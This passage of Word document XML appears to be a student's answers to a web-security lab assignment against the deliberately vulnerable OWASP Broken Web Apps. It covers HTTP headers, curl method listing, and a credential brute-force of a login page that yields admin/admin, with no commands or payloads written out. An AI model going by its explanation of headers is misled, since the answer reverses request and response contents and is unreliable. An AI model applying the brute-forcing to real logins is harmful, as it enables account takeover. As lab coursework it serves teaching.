          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BB0319" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="007D5D6F" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00BB0319" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0069357B" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sponse Header</w:t>
      </w:r>
      <w:r w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EDB8D" w14:textId="685FCD3F" w:rsidR="00BB0319" w:rsidRDefault="00052CA9" w:rsidP="00052CA9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D58D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803E7B" w14:paraId="108A7E63" w14:textId="77777777" w:rsidTr="00B712F1">
        <w:trPr>
          <w:trHeight w:val="4558"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFA8385" w14:textId="77777777" w:rsidR="00803E7B" w:rsidRDefault="001B4D91" w:rsidP="005C2B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he response header consists of the cooki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but the request header does not.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0972B4B0" w14:textId="600637C0" w:rsidR="001B4D91" w:rsidRPr="005C2BCF" w:rsidRDefault="006A33FF" w:rsidP="005C2BC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request header </w:t>
            </w:r>
            <w:r w:rsidR="00D56068">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>contains the server information it is sending the data too while the response header contains the user’s browser information that the data is heading to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0225CB60" w14:textId="77777777" w:rsidR="00803E7B" w:rsidRPr="00803E7B" w:rsidRDefault="00803E7B" w:rsidP="00803E7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6667BA" w14:textId="33A798A0" w:rsidR="007437EF" w:rsidRDefault="007437EF" w:rsidP="006E7A49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3011F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003011F3" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="003011F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool </w:t>
      </w:r>
      <w:r w:rsidR="001D7F18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to list </w:t>
      </w:r>
      <w:r w:rsidR="001C19C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">all the </w:t>
      </w:r>
      <w:r w:rsidR="001D7F18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">various HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00974B70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">methods </w:t>
      </w:r>
      <w:r w:rsidR="00797071">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>supported by</w:t>
      </w:r>
      <w:r w:rsidR="00D115F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A0BF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00ED06B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidR="009107E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidR="00ED1777">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r w:rsidR="009107E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>running the</w:t>
      </w:r>
      <w:r w:rsidR="00D115F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00835ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Broken Web App</w:t>
      </w:r>
      <w:r w:rsidR="00494474">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002954DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00835ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(owaspbwa)</w:t>
      </w:r>
      <w:r w:rsidR="005773D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005773D8" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide a screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00F57654">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D4A5B" w:rsidRPr="00721B50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6D4A5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F57654">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F57654" w:rsidRPr="004245E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url</w:t>
      </w:r>
      <w:r w:rsidR="00F57654" w:rsidRPr="004245EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool command and its output</w:t>
      </w:r>
      <w:r w:rsidR="00F57654">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502D280" w14:textId="1AAFD562" w:rsidR="00804792" w:rsidRDefault="00804792" w:rsidP="008047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804792">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004D58DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00804792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90644" w14:paraId="2796ED0B" w14:textId="77777777" w:rsidTr="00B712F1">
        <w:trPr>
          <w:trHeight w:val="3923"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C166F0" w14:textId="632E3E75" w:rsidR="00C90644" w:rsidRDefault="006172D0" w:rsidP="00C90644">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Hlk119330382"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Error </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="6"/>
    </w:tbl>
    <w:p w14:paraId="6699DA07" w14:textId="77777777" w:rsidR="00C90644" w:rsidRPr="00804792" w:rsidRDefault="00C90644" w:rsidP="00C90644">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148C5622" w14:textId="77777777" w:rsidR="00882C6F" w:rsidRPr="00882C6F" w:rsidRDefault="00882C6F" w:rsidP="00882C6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6D3ADE" w14:textId="77777777" w:rsidR="00B712F1" w:rsidRPr="002135A4" w:rsidRDefault="00B712F1" w:rsidP="00B712F1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Pr="00B712F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1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4F41CC26" w14:textId="77777777" w:rsidR="00B712F1" w:rsidRPr="00B712F1" w:rsidRDefault="00B712F1" w:rsidP="00B712F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CEC6CE" w14:textId="77777777" w:rsidR="003C3655" w:rsidRPr="003C3655" w:rsidRDefault="003C3655" w:rsidP="003C3655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Use appropriate tools to perform any type of Credential Brute Forcing attack on any of the vulnerable web applications running inside the owaspbwap / bWAPP virtual. Provide important step by step screenshots highlighting the tool’s commands and their respective outputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D28409" w14:textId="4E48A763" w:rsidR="00901B9F" w:rsidRDefault="003C3655" w:rsidP="003C3655">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3655">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3655">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A5EED" w14:textId="77777777" w:rsidR="003C3655" w:rsidRDefault="003C3655" w:rsidP="003C3655">
      <w:pPr>
        <w:spacing w:after="0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3C3655" w14:paraId="5AA0B1AA" w14:textId="77777777" w:rsidTr="00EF5B28">
        <w:trPr>
          <w:trHeight w:val="10912"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D34F672" w14:textId="068437BA" w:rsidR="00EC303D" w:rsidRDefault="00EC303D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95A94F1" w14:textId="1B7B2C99" w:rsidR="00EC303D" w:rsidRDefault="00EC303D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C303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F6AA214" wp14:editId="3D901BB7">
                  <wp:extent cx="3528060" cy="3211484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288" cy="32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B68072" w14:textId="736A5181" w:rsidR="00EC303D" w:rsidRPr="00EC303D" w:rsidRDefault="00EC303D" w:rsidP="00EC30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C5B5A0" w14:textId="77777777" w:rsidR="00EC303D" w:rsidRPr="00EC303D" w:rsidRDefault="00EC303D" w:rsidP="00EC303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5168711" w14:textId="119C88B3" w:rsidR="003C3655" w:rsidRDefault="00891CC7" w:rsidP="00891CC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fter enumerating the </w:t>
            </w:r>
            <w:r w:rsidR="00815C12">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>website,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> we find the login page which does not have any accoun lockout thus making it vulnerable to credential brute forcing attacks. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363AED21" w14:textId="77777777" w:rsidR="0041224D" w:rsidRDefault="0041224D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353B60A" w14:textId="102C0B40" w:rsidR="0041224D" w:rsidRDefault="0041224D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41224D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440FD0A" wp14:editId="1518F9B4">
                  <wp:extent cx="3337560" cy="335530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926" cy="336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84B14" w14:textId="381FF108" w:rsidR="0062778C" w:rsidRDefault="0062778C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62778C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31B728C0" wp14:editId="1CFED80B">
                  <wp:extent cx="3970020" cy="31827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20" cy="31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6E848B" w14:textId="76DF8AA8" w:rsidR="00402CD9" w:rsidRDefault="00402CD9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78D737C7" w14:textId="0DB0B0DA" w:rsidR="00402CD9" w:rsidRDefault="00402CD9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ing payloads for the login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ser nam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we fuzz </w:t>
            </w:r>
            <w:r w:rsidR="00091DB0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">all the combination of entires in the 2 payloads. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604DA08C" w14:textId="77777777" w:rsidR="0041224D" w:rsidRDefault="0041224D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1AE7CF10" w14:textId="77777777" w:rsidR="00091DB0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618BEB26" w14:textId="77777777" w:rsidR="00091DB0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F25D108" w14:textId="77777777" w:rsidR="0041224D" w:rsidRDefault="00C203B3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203B3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BE5A335" wp14:editId="771531D3">
                  <wp:extent cx="4244340" cy="122364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230DA" w14:textId="77777777" w:rsidR="00091DB0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56537447" w14:textId="5EE7D19E" w:rsidR="00091DB0" w:rsidRPr="0041224D" w:rsidRDefault="00091DB0" w:rsidP="0041224D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assword is admin and usernam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so admin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00091DB0" w14:paraId="4C426AF9" w14:textId="77777777" w:rsidTr="007A42F9">
        <w:trPr>
          <w:trHeight w:val="2826"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39FD7A1D" w14:textId="2B0EB464" w:rsidR="00091DB0" w:rsidRPr="00091DB0" w:rsidRDefault="00091DB0" w:rsidP="00091D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A9D17B" w14:textId="77777777" w:rsidR="003C3655" w:rsidRPr="003C3655" w:rsidRDefault="003C3655" w:rsidP="007A42F9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="120"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741D4B40" w14:textId="528C0C6C" w:rsidR="006E7A49" w:rsidRPr="00091DB0" w:rsidRDefault="000212D3" w:rsidP="00091DB0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E07D95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QUESTION 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07D95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E07D95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009F5552" w:rsidRPr="00E07D95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07D95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCF3CE" w14:textId="77777777" w:rsidR="00B66B31" w:rsidRPr="00803E7B" w:rsidRDefault="00B66B31" w:rsidP="00B66B31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3D414410" w14:textId="77777777" w:rsidR="00B66B31" w:rsidRPr="006E7A49" w:rsidRDefault="00B66B31" w:rsidP="006E7A4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34589F" w14:textId="639CF60C" w:rsidR="006E7A49" w:rsidRDefault="00DB5C7C" w:rsidP="00431D23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947EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an appropriate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tool </w:t>
      </w:r>
      <w:r w:rsidR="00AD7DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">targeting </w:t>
      </w:r>
      <w:r w:rsidR="00A222AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00290AC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">web server </w:t>
      </w:r>
      <w:r w:rsidR="00ED1777">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r w:rsidR="00290AC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>running the OWASP Broken Web Apps (owaspbwa)</w:t>
      </w:r>
      <w:r w:rsidR="005F09A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00290AC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007307CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004C0504">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">detect </w:t>
      </w:r>
      <w:r w:rsidR="002A515C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="004C0504" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Server OS</w:t>
      </w:r>
      <w:r w:rsidR="004C0504">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C8388B" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Open Ports</w:t>
      </w:r>
      <w:r w:rsidR="00C8388B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="00FD3F29" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Running Services/</w:t>
      </w:r>
      <w:r w:rsidR="00672D60" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Software Versions</w:t>
      </w:r>
      <w:r w:rsidR="007307CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7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DE2EF7" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidR="007937F7" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00B46D3D" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DE2EF7" w:rsidRPr="00B46D3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
